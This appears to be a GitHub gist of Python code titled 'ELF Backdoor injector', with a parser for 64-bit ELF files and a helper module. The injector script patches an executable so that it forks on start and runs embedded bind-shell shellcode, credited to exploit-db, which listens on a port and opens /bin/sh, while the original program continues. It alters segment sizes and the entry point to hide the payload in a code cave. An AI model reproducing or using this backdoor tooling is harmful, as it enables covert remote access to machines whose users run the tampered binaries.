Skip to content

Instantly share code, notes, and snippets.

@suzuke
Created August 28, 2022 06:57
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save suzuke/d23a8db3c802de9f9a541240ad54b526 to your computer and use it in GitHub Desktop.
Save suzuke/d23a8db3c802de9f9a541240ad54b526 to your computer and use it in GitHub Desktop.
ELF Backdoor injector
from utils import parse_args
from parse import elf_info
from struct import pack
import logging
logger = logging.getLogger(__name__)
logging.basicConfig(level=logging.NOTSET)
class injector:
def __init__(self, file, inject_code: bytes):
self.file = file
self.info = elf_info(self.file)
code = b''.join([b'\x6a\x39', # push 0x39
b'\x58', # pop rax
b'\x0f\x05', # syscall
b'\x48\x85\xc0', # test rax, rax
b'\x74\x0c', # je 0x16
# movabs rbp, entry
b'\x48\xbd' + pack('<Q', self.info.header['e_entry']),
b'\xff\xe5', # jmp rbp
inject_code]) # inject code
segs = self.find_cave(len(code))
if len(segs) == 0:
logger.error('No cave in the program')
return
target_idx = segs[0]['index']
target = self.info.segments[target_idx]
code_offset = target['p_offset'] + target['p_filesz']
logger.info(f'Writing code to 0x{code_offset:x}')
self.add_machine_code(code_offset, code)
new_size = target['p_filesz'] + len(code)
logger.info(f'Writing file/mem size to 0x{new_size:x}')
self.extend_seg_size(target_idx, new_size)
code_va = target['p_vaddr'] + target['p_filesz']
logger.info(f'Writing entry to 0x{code_va:x}')
self.modify_entry(code_va)
def verify_cave(self, start: int, len_: int) -> int:
'''
Walking through file to verlify cave's size
'''
self.file.seek(start)
count = 0
while self.file.tell() < start + len_:
b = self.file.read(1)
if b == b'\x00':
count += 1
else:
break
return count
def find_cave(self, need_size: int):
'''
Find the cave in LOAD, exec segment
cave means segment's file size is smaller than alloc size
'''
load_segs = list(filter(lambda x: x['p_type'] == 1,
self.info.segments))
if len(load_segs) <= 0:
exit(1)
cave_segs = []
for i in range(len(load_segs) - 1):
c_seg = load_segs[i]
n_seg = load_segs[i + 1]
# Not a LOAD segments
if not c_seg['p_flags'] & 1:
continue
# First verify
max_range = c_seg['p_filesz'] + c_seg['p_vaddr']
if max_range >= n_seg['p_vaddr']:
continue
real_size = self.verify_cave(c_seg['p_offset'] + c_seg['p_filesz'],
n_seg['p_vaddr'] - max_range)
# cave size is too small
if real_size <= need_size:
continue
logger.info(f'Found a {real_size} bytes cave')
cave_segs.append({'index': self.info.segments.index(c_seg),
'cave_size': real_size})
return cave_segs
def extend_seg_size(self, seg_pos: int, new_size: int):
'''
Patch segment to increase LOAD file size
'''
file_pos = self.info.header['e_phoff'] + \
seg_pos * self.info.header['e_phentsize']
if self.info.header['e_machine'] == 62:
file_pos += 32
# TODO: abstract elf types to adapt more architectures
else:
pass
self.file.seek(file_pos)
# TODO: static pack size
self.file.write(pack('<Q', new_size) * 2)
def add_machine_code(self, pos: int, code: bytes):
'''
Add code in the increased LOAD segments
'''
self.file.seek(pos)
self.file.write(code)
def modify_entry(self, new_entry: int):
self.file.seek(24)
self.file.write(pack('<Q', new_entry))
if __name__ == "__main__":
'''
# NOP Test
code = b'\x90\x90\x90'
# spawn a shell
code = b'\x48\x31\xf6\x56'
code += b'\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68'
code += b'\x57\x54\x5f\x6a\x3b\x58\x99\x0f\x05'
'''
# Bind shell: <https://www.exploit-db.com/shellcodes/41128>
code = b"\x48\x31\xc0\x48\x31\xd2\x48\x31\xf6\xff\xc6\x6a\x29\x58\x6a\x02"
code += b"\x5f\x0f\x05\x48\x97\x6a\x02\x66\xc7\x44\x24\x02\x15\xe0"
code += b"\x54\x5e\x52\x6a\x31\x58\x6a\x10\x5a\x0f\x05\x5e\x6a\x32\x58"
code += b"\x0f\x05"
code += b"\x6a\x2b\x58\x0f\x05\x48\x97\x6a\x03\x5e\xff\xce\xb0\x21\x0f\x05"
code += b"\x75\xf8\xf7\xe6\x52\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68"
code += b"\x53\x48\x8d\x3c\x24\xb0\x3b\x0f\x05"
args = parse_args()
if args.file:
with open(args.file, 'rb+') as f:
injector(f, code)
'''
[ELF Document](https://uclibc.org/docs/elf-64-gen.pdf)
'''
from utils import parse_args, debug_print
from struct import unpack
from typing import List, Dict, BinaryIO, Union, Any
Header = Dict[str, Any]
Segments = List[Dict[str, int]]
Sections = List[Dict[str, Union[int, str]]]
class elf_info:
'''
This class will parse ELF file and get information from ELF file.
'''
def __init__(self, file: BinaryIO):
self.file = file
self.header = self._parse_header()
self.segments = self._parse_segment()
self.sections = self._parse_section()
self._add_section_name()
def _parse_header(self) -> Header:
'''
header parse part.
'''
hdr = {}
hdr['e_ident'] = unpack('4sccccc6sc', self.file.read(16))
hdr['e_type'], hdr['e_machine'] = unpack('<hh', self.file.read(4))
hdr['e_version'], = unpack('<I', self.file.read(4))
# Entry point virtual address
hdr['e_entry'], = unpack('<Q', self.file.read(8))
# segment/section header file offset
hdr['e_phoff'], hdr['e_shoff'] = unpack('<QQ', self.file.read(16))
# Processor-specific flags, ELF Header size in bytes
hdr['e_flags'], hdr['e_ehsize'] = unpack('<Ih', self.file.read(6))
# Program header table entry size, Program header table entry count
hdr['e_phentsize'], hdr['e_phnum'] = unpack('<hh', self.file.read(4))
# Section header table entry size, Section header table entry count
hdr['e_shentsize'], hdr['e_shnum'] = unpack('<hh', self.file.read(4))
# Section header string table index
hdr['e_shtrndx'], = unpack('<h', self.file.read(2))
return hdr
def _parse_segment(self) -> Segments:
'''
segment/program header parse part.
'''
self.file.seek(self.header['e_phoff'])
segments = []
for i in range(self.header['e_phnum']):
seg = {}
# Type of segment, Segment attributes
seg['p_type'], seg['p_flags'] = unpack('<II', self.file.read(8))
# Offset in file
seg['p_offset'], = unpack('<Q', self.file.read(8))
# Virtual address in memory, Reserved
seg['p_vaddr'], seg['p_paddr'] = unpack('<QQ', self.file.read(16))
# Size of segment in file, Size of segment in memory
seg['p_filesz'], seg['p_memsz'] = unpack('<QQ', self.file.read(16))
# Alignment of segment
seg['p_align'], = unpack('<Q', self.file.read(8))
segments.append(seg)
return segments
def _add_section_name(self):
'''
After section parsing,
this class will use ELF header's e_shtrndx to get shstrtab's position
and get other sections' name.
'''
# use session string index to get session string's file offset
shstrtab_offset = self.sections[self.header['e_shtrndx']]['sh_offset']
for j in self.sections:
# use file offset to get section name
assert isinstance(shstrtab_offset, int) and \
isinstance(j['sh_name'], int)
self.file.seek(shstrtab_offset + j['sh_name'])
s_name_str = ''
while True:
t = self.file.read(1)
if t == b'\x00':
break
s_name_str += t.decode()
j['s_name_str'] = s_name_str
def _parse_section(self) -> Sections:
'''
section parse part.
'''
self.file.seek(self.header['e_shoff'])
sections = []
for i in range(self.header['e_shnum']):
sec = {}
# Section name and type
sec['sh_name'], sec['sh_type'] = unpack('<II', self.file.read(8))
# Section attributes
sec['sh_flags'], = unpack('<Q', self.file.read(8))
# Virtual address in memory, Offset in file
sec['sh_addr'], sec['sh_offset'] = unpack('QQ', self.file.read(16))
# Size of section
sec['sh_size'], = unpack('<Q', self.file.read(8))
# Link to other section Miscellaneous information
sec['sh_link'], sec['sh_info'] = unpack('<II', self.file.read(8))
# Address alignment boundary, Size of entries, if section has table
sec['sh_addralign'], sec['sh_entsize'] = unpack(
'QQ', self.file.read(16))
sections.append(sec)
return sections
def analyse_segment(self) -> Dict[int, List[str]]:
'''
Analyse the sessions and segment's relation
'''
dic: Dict[int, List[str]] = {}
for i in range(len(self.segments)):
dic[i] = []
for sec in self.sections:
assert isinstance(sec['sh_addr'], int) and \
isinstance(sec['sh_size'], int)
sec_begin = sec['sh_addr']
sec_end = sec_begin + sec['sh_size']
for i, seg in enumerate(self.segments):
seg_begin = seg['p_vaddr']
seg_end = seg_begin + seg['p_memsz']
if sec_begin >= seg_begin and sec_end <= seg_end:
assert isinstance(sec['s_name_str'], str)
dic[i].append(sec['s_name_str'])
return dic
if __name__ == '__main__':
args = parse_args()
with open(args.file, 'rb') as f:
info = elf_info(f)
result = info.analyse_segment()
debug_print(info.header,
info.segments,
info.sections,
result)
from argparse import ArgumentParser
from logging import getLogger, NOTSET
def get_logger(name: str = ''):
logger = getLogger(name)
logger.setLevel(NOTSET)
return logger
def parse_args():
parser = ArgumentParser()
parser.add_argument('-f', '--file')
return parser.parse_args()
def print_table(lst):
for i in lst:
if isinstance(i, str):
if len(i) > 10:
i = i[:10]
print(f'{i:<10s} ', end='')
elif isinstance(i, int):
print(f'{i:<10x} ', end='')
print('')
def debug_print(header,
segments,
sections,
result):
print('[+] ELF Header')
for k, v in header.items():
print(' ', f'{k} {v}')
print('[+] segments')
print_table(list(segments[0].keys()))
for j in segments:
print_table(list(j.values()))
print('[+] sections')
print_table(list(sections[1].keys()))
# do not use j to be a variable name,
# because the type of j is different to i...
# F-WORD mypy!
for i in sections:
print_table(list(i.values()))
print('[+] analyse')
for k, v in result.items():
print(k, ' '.join(v))
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment